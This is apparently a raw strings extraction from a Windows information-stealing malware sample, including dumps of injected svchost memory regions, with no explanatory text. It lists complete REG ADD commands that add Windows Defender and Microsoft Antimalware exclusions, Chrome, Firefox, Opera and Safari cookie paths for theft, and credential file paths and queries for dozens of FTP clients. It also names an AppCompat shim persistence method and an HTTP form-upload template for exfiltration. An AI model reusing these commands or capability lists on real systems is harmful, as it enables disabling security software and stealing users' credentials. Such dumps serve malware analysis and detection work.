DisconnectNamedPipe

PeekNamedPipe

SetNamedPipeHandleState

WaitNamedPipeA

kernel32.dll

ExitWindowsEx

user32.dll

RegCloseKey

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExA

RegQueryInfoKeyA

advapi32.dll

modules.dll

GetWindowsDirectoryA

{X-X-X-X-XX}

ntdll.dll

shlwapi.dll

SHDeleteKeyA

SOFTWARE\Microsoft\Windows\CurrentVersion

shell32.dll

%CommonProgramFiles%

\/*.*

\\.\pipe\

VWRQRh.exe

h.exe

ws2_32.dll

RegCreateKeyExA

ShellExecuteA

gdi32.dll

ole32.dll

rmnsoft.dll

google.com:80

bing.com:80

yahoo.com:80

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Windows Defender

Software\Microsoft\Windows\CurrentVersion\Policies

Software\Microsoft\Windows\CurrentVersion\Policies\Associations

Software\Microsoft\Windows\CurrentVersion\policies\system

\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

"ntdll.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows\CurrentVersion\Run

HTTP/*.*

/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Referer: %s

Content-Type: multipart/form-data; boundary=%s

Content-Length: %d

Content-Disposition: form-data; name="%s"

--%s--

%s /%s HTTP/1.1

Host: %s

User-Agent: %s

%sAccept-Language: %s

HTTP/1.x 301 Moved Permanently

Server: Apache/2.2.14

gdiplus.dll

GdiplusShutdown

\\.\131D2408D44C4f47AC647AB96987D4D5

\Google\Chrome\User Data\Default\Cookies

\Google\Chrome\User Data\Default\Extension Cookies

%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist

%APPDATA%\Mozilla\Firefox\

%WinDir%\Application Data\Mozilla\Firefox\

profiles.ini

Profile%d

\cookies.txt

\cookies.sqlite

%APPDATA%\Opera\

\profile\cookies4.dat

\cookies4.dat

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe

FireFox Cookies\Profile %d\cookies.txt

FireFox Cookies\Profile %d\cookies.sqlite

Chrome\Cookies

Chrome\Extension Cookies

Opera\Profile %d\cookies4.dat

Safari\Cookies.plist

1etexec

complete.dat

<"<(<.<4<:<@<

SRQVWh.exe

h.exeVj

h.exeh$~

tvh.exe

PSSSSSSh

More information: hXXp://VVV.ibsensoftware.com/

Advapi32.dll

RegDeleteKeyExA

com.%s.sdb

%s\cmd.%s.bat

start "" "%s"

"%%windir%%\%s\iscsicli.exe"

/q "%s"

\system32\sdbinst.exe"

SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\

SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\

\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb

/q /u "%s"

SOFTWARE\Microsoft\Windows NT\CurrentVersion\

SOFTWARE\Microsoft\Updates\Windows XP\SP4

SOFTWARE\Microsoft\Updates\Windows XP\SP3

SOFTWARE\Microsoft\Updates\Windows XP\SP10

SOFTWARE\Microsoft\Updates\Windows XP\SP0

SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages

:Zone.Identifier:$DATA

:Zone.Identifier

svchost.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0

REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0

spoolsv.exe

..\p.exe

CheckBypassed ok

loader.exe

_CheckBypassed@0

|GetWindowsDirectoryA

\/{X-X-X-X-XX}

|ZwDelayExecution

%ProgramFiles%\Internet Explorer\iexplore.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

http\shell\open\command

chrome.exe

opera.exe

cmd.exe

/C ""%s"" %s

/C ""%s""

user32.DLL

p.exe

Rapport

1onsent.exe

&.bAp

%Program Files%\Internet Explorer\iexplore.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe

GetProcessHeap

RegEnumKeyA

RegOpenKeyA

ShellExecuteExA

SetWindowsHookExA

UnhookWindowsHook

EnumWindows

.rdata

.rsrc

*HI0.XF

PF8-.XU

O3$dS7"%U9

KERNEL32.DLL

multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://

2.1.0.3

iscsicli.exe

RedirectEXE

%temp%\..\..\LocalLow\cmd.%username%.bat

emsseces.exe

svchost.exe_432_rwx_20010000_00001000:

.text

`.rdata

@.data

.reloc

svchost.exe_432_rwx_20021000_0000D000:

Gh.logWj

h.logPj

h.exe

{X-X-X-X-XX}

\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

"ntdll.dll

kernel32.dll

shlwapi.dll

SHDeleteKeyA

SOFTWARE\Microsoft\Windows\CurrentVersion

shell32.dll

%CommonProgramFiles%

\/*.*

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows\CurrentVersion\Run

advapi32.dll

\AVG\AVG2013\avgui.exe

\AVAST Software\Avast\AvastUI.exe

\ESET\ESET NOD32 Antivirus\egui.exe

*.exe

\Bitdefender\Bitdefender 2013\seccenter.exe

\uiStub.exe

%Documents and Settings%\%current user%\Local Settings\Application Data\wyxhmtka.log

GetWindowsDirectoryA

RegCloseKey

RegCreateKeyExA

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExA

RegQueryInfoKeyA

ShellExecuteA

ExitWindowsEx

.text

.rdata

@.data

.reloc

{X-4

Windows\CurrentVersion\Un

api.SHD:

eKeyA

XM%S_O;

svchost.exe_432_rwx_20031000_00011000:

Gh.logWj

h.logPj

{X-X-X-X-XX}

ntdll.dll

kernel32.dll

shlwapi.dll

SHDeleteKeyA

SOFTWARE\Microsoft\Windows\CurrentVersion

shell32.dll

%CommonProgramFiles%

\/*.*

advapi32.dll

wshell32.dll

\Google\Chrome\User Data\Default\Cookies

\Google\Chrome\User Data\Default\Extension Cookies

%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist

%APPDATA%\Mozilla\Firefox\

%WinDir%\Application Data\Mozilla\Firefox\

profiles.ini

Profile%d

\cookies.txt

\cookies.sqlite

%APPDATA%\Opera\

\profile\cookies4.dat

\cookies4.dat

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe

FireFox Cookies\Profile %d\cookies.txt

FireFox Cookies\Profile %d\cookies.sqlite

Chrome\Cookies

Chrome\Extension Cookies

Opera\Profile %d\cookies4.dat

Safari\Cookies.plist

GetWindowsDirectoryA

RegQueryInfoKeyA

RegOpenKeyExA

RegEnumKeyExA

RegDeleteKeyA

RegCloseKey

ExitWindowsEx

.text

`.rdata

@.data

.reloc

{X-

eKeyA

s^.exe

svchost.exe_432_rwx_20051000_00011000:

0WSSh

h.log

%USERPROFILE%

Kernel32.dll

%s %s %s: %s:%d

GetWindowsDirectoryA

GetProcessHeap

PeekNamedPipe

.text

`.rdata

@.data

.idata

.reloc

ernel32.dllS.

ls.EnW

m.div

svchost.exe_432_rwx_20071000_000A0000:

i<%u-

.iniu>

.exeuZH

=.datuLh

Q=.bpsuLh

.xmluIh

t%SVP

.iniu

.prfu1

h.log

Q.Rjv

H.Qjv

#$%&'()* ,--

-4-4--567

s%j.Zf

j%Xf;

>%u[f

FtpControl

32bit FTP

LeapFtp

SoftFx FTP

ClassicFTP

WebSitePublisher

FtpExplorer

Core ftp

Coffee cup ftp

FFFtp

TurboFtp

SmartFtp

BulletproofFTP

FtpCommander

Cute FTP

WS FTP

Windows/Total commander

PTF://

Password

password

FtpIniName

\Ipswitch\WS_FTP Home\Sites

\Ipswitch\WS_FTP\Sites

\%.d.0

Quick.dat

port

sitemanager.xml

Port

Software\Microsoft\Windows\CurrentVersion\Uninstall

History.dat

Favorites.dat

\Frigate3\FtpSite.XML

\sites.xml

\FTPRush\RushSite.xml

SET PASS

NODE: TYPE = FTP

\BitKinex\bitkinex.ds

_Password

FtpUserName

FtpServer

FtpDirectory

FtpDescription

_FtpPassword

SELECT ServerName, Url, ServerUser, ServerPass, RemoteDir FROM "TServers"

SharedSettings.ccs

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

sites.dat

LeapFTP

HostPassword

\32BitFtp.ini

PassWord

%USERPROFILE%

Kernel32.dll

sql_trace

sqlite_version

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

ABORTABLEFTEMPORARYADDATABASELECTHENDEFAULTRANSACTIONATURALTERAISEACHECKEYAFTEREFERENCESCAPELSEXCEPTRIGGEREGEXPLAINITIALLYANALYZEXCLUSIVEXISTSTATEMENTANDEFERRABLEATTACHAVINGLOBEFOREIGNOREINDEXAUTOINCREMENTBEGINNERENAMEBETWEENOTNULLIKEBYCASCADEFERREDELETECASECASTCOLLATECOLUMNCOMMITCONFLICTCONSTRAINTERSECTCREATECROSSCURRENT_DATECURRENT_TIMESTAMPLANDESCDETACHDISTINCTDROPRAGMATCHFAILIMITFROMFULLGROUPDATEIFIMMEDIATEINSERTINSTEADINTOFFSETISNULLJOINORDEREPLACEOUTERESTRICTPRIMARYQUERYRIGHTROLLBACKROWHENUNIONUNIQUEUSINGVACUUMVALUESVIEWHEREVIRTUAL

f){-.gBsu1Z2^

3.3.14

Ad-d-d d:d:d

d:d:d

d-d-d

M@d

2147483647

%s\etilqs_

Outstanding page count goes from %d to %d during this analysis

Pointer map page %d is referenced

Page %d is never used

Unable to malloc %d bytes

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

Failed to read ptrmap key=%d

freelist leaf count too big on page %d

failed to get page %d

%d of %d pages missing from overflow list starting at %d

2nd reference to page %d

invalid page number %d

Fragmented space is %d byte reported as %d on page %d

Multiple uses for byte %d of page %d

Corruption detected in cell %d on page %d

On page %d at right child:

On tree page %d cell %d:

initPage() returns error code %d

unable to get the page. error code=%d

Page %d:

%s(%d)

keyinfo(%d

%s-mjX

Aunable to use function %s in the requested context

Unsupported module operation: xNext

Unsupported module operation: xColumn

Unsupported module operation: xRowid

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s

sqlite_master

sqlite_temp_master

transaction - SQL statements in progress

variable number must be between ?1 and ?%d

not authorized to use function: %s

ambiguous column name: %s

no such column: %s

%.*s%Q%s

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q

sqlite_sequence

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name, %d 18,10) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

table %s may not be altered

sqlite_

there is already another table or index with this name: %s

%s OR name=%Q

UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d,length(sql)) WHERE type = 'table' AND name = %Q

Cannot add a PRIMARY KEY column

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

CREATE TABLE %Q.sqlite_stat1(tbl,idx,stat)

sqlite_stat1

SELECT idx, stat FROM %Q.sqlite_stat1

sqlite_detach

sqlite_attach

unable to open database: %s

database %s is already in use

too many attached databases - max %d

database %s is locked

cannot detach database %s

no such database: %s

%s %T cannot reference objects in database %s

access to %s.%s is prohibited

access to %s.%s.%s is prohibited

illegal return value (%d) from the authorization function - should be SQLITE_OK, SQLITE_IGNORE, or SQLITE_DENY

no such table: %s

no such table: %s.%s

object name reserved for internal use: %s

there is already an index named %s

duplicate column name: %s

default value of column [%s] is not constant

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

table "%s" has more than one primary key

CREATE TABLE %Q.sqlite_sequence(name,seq)

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#0, sql=%Q WHERE rowid=#1

CREATE %s %.*s

view %s is circularly defined

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %s.sqlite_sequence WHERE name=%Q

use DROP VIEW to delete view %s

use DROP TABLE to delete table %s

table %s may not be dropped

UPDATE %Q.%s SET rootpage=%d WHERE #0 AND rootpage=#0

unknown column "%s" in foreign key definition

number of columns in foreign key does not match the number of columns in the referenced table

foreign key on %s should reference only one column of table %T

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#0,%Q);

CREATE%s INDEX %.*s

table %s has no column named %s

sqlite_autoindex_

index %s already exists

there is already a table named %s

virtual tables may not be indexed

views may not be indexed

table %s may not be indexed

indexed columns are not unique

DELETE FROM %Q.%s WHERE name=%Q

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

no such index: %S

unable to identify the object to be reindexed

no such collation sequence: %s

cannot modify %s because it is a view

table %s may not be modified

table %S has no column named %s

%d values for %d columns

table %S has %d columns but %d values were supplied

PRIMARY KEY must be unique

error during initialization: %s

no entry point [%s] in shared library [%s]

unable to open shared library [%s]

sqlite3_extension_init

automatic extension loading failed: %s

unsupported encoding: %s

*** in database %s ***

foreign_key_list

SELECT name, rootpage, sql FROM '%q'.%s

unsupported file format

database schema is locked: %s

RIGHT and FULL OUTER JOINs are not currently supported

unknown or unsupported join type: %T%s%T%s%T

%z:%d

column%d

%s.%s

sqlite_subquery_%p_

cannot join using column %s - column not present in both tables

cannot have both ON and USING clauses in the same join

a NATURAL join may not have an ON or USING clause

%s BY column number %d out of range - should be between 1 and %d

SELECTs to the left and right of %s do not have the same number of result columns

LIMIT clause should come after %s not before

ORDER BY clause should come after %s not before

ORDER BY term number %d does not match any result column

ORDER BY position %d should be between 1 and %d

sqlite3_get_table() called with two or more incompatible queries

cannot create INSTEAD OF trigger on table: %S

cannot create %s trigger on view: %S

no such trigger: %S

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21,100000000) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14,100000000) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14,100000000) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

PRAGMA vacuum_db.synchronous=OFF

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#1

no such module: %s

vtable constructor did not declare schema: %s

vtable constructor failed: %s

%z VIRTUAL TABLE INDEX %d:%s

%z USING PRIMARY KEY

%z WITH INDEX %s

%z AS %s

TABLE %s

B}Tat most %d tables in a join

incomplete SQL statement

kernel lacks large file support

SQL logic error or missing database

Invalid parameter passed to C runtime function.

SOFTWARE\Far2\SavedDialogHistory\FTPHost

SOFTWARE\Far2\Plugins\FTP\Hosts

\wcx_PTF.ini

Software\Ghisler\Windows Commander

CSMFTPItem

\sm.dat

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Home

\GlobalSCAPE\CuteFTP Lite

\Quick.dat

\Sites.dat

<schema> <document name="FileZilla3"> <collection name="Servers"> <collection name="Server" type="mixed"> <text name="Host"/> <text name="Port"/> <text name="Protocol"/> <text name="Type"/> <text name="User"/> <text name="Pass"/> <text name="Logontype"/> <text name="TimezoneOffset"/> <text name="PasvMode"/> <text name="MaximumMultipleConnections"/> <text name="EncodingType"/> <text name="BypassProxy"/> <text name="Name"/> <text name="Comments"/> <text name="LocalDir"/> <text name="RemoteDir"/> <text name="SyncBrowsing"/> </collection> </collection> </document></schema>

<schema> <document name="FileZilla3"> <collection name="RecentServers"> <collection name="Server" type="mixed"> <text name="Host"/> <text name="Port"/> <text name="Protocol"/> <text name="Type"/> <text name="User"/> <text name="Pass"/> <text name="Logontype"/> <text name="TimezoneOffset"/> <text name="PasvMode"/> <text name="MaximumMultipleConnections"/> <text name="EncodingType"/> <text name="BypassProxy"/> </collection> </collection> </document></schema>

\FileZilla\sitemanager.xml

\FileZilla\recentservers.xml

\ftplist.txt

FTP Commander Pro

FTP Navigator

FTP Commander

FTP Commander Deluxe

Software\BFTP

\BulletProof Software\BulletProof FTP Client 2009

\BulletProof Software\BulletProof FTP Client